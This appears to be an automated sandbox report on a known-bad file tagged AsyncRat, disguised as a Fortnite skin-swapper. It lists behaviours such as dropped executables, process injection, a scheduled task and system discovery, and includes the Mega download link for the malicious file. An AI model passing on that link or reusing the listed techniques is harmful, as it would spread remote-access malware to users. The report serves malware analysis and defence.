Analysis Overview
Threat Level: Known bad
The file https://mega.nz/file/CUt1QDyR#n6vgudTHTYgM_mZuot-SW_zmhiqVQXzqt_2RFi4uTMM was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Enumerates connected drives
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Browser Information Discovery
NTFS ADS
Modifies data under HKEY_USERS
Enumerates system info in registry
Checks SCSI registry key(s)
Checks processor information in registry
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: AddClipboardFormatListener
Scheduled Task/Job: Scheduled Task
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-02 15:27
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-02 15:27
Reported
2024-08-02 15:41
Platform
win10v2004-20240802-es
Max time kernel
602s
Max time network
606s
Command Line
Signatures
AsyncRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\UnRAR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\rnpkeys.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Server-Host.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\rnpkeys.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\D: | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\msiexec.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 5140 set thread context of 5220 | N/A | C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\rnpkeys.exe | C:\Windows\SysWOW64\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\Installer\MSIEF44.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{EE732749-08BE-4A8A-B918-99E4E0373581} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIED6E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF168.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF198.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI21D7.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI21F7.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI24B8.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2197.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5aea61.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5aea61.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFEC9.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFEE9.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2148.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF1E7.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI40B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5aea65.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2236.tmp | C:\Windows\system32\msiexec.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Server-Host.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key deleted | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_CLASSES\7-ZIP.RAR\SHELL\OPEN\COMMAND | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.cab | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.lzma\shell\open\command | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.7z\shell\open | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.xz\DefaultIcon\ = "C:\\Program Files\\7-Zip\\7z.dll,23" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.txz\DefaultIcon | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.lzma\shell\open | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.tar\shell | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.zip\ = "7-Zip.zip" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.rar\shell\ | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.tar\shell\open | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.rar | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.cab | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.rar | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.iso | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.txz | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.rar\ = "rar Archive" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.iso\shell\open | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.tar\shell\open\command\ = "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"%1\"" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.zip\DefaultIcon | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.xz\shell\open | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.tar\shell\open | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.bz2\ = "7-Zip.bz2" | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
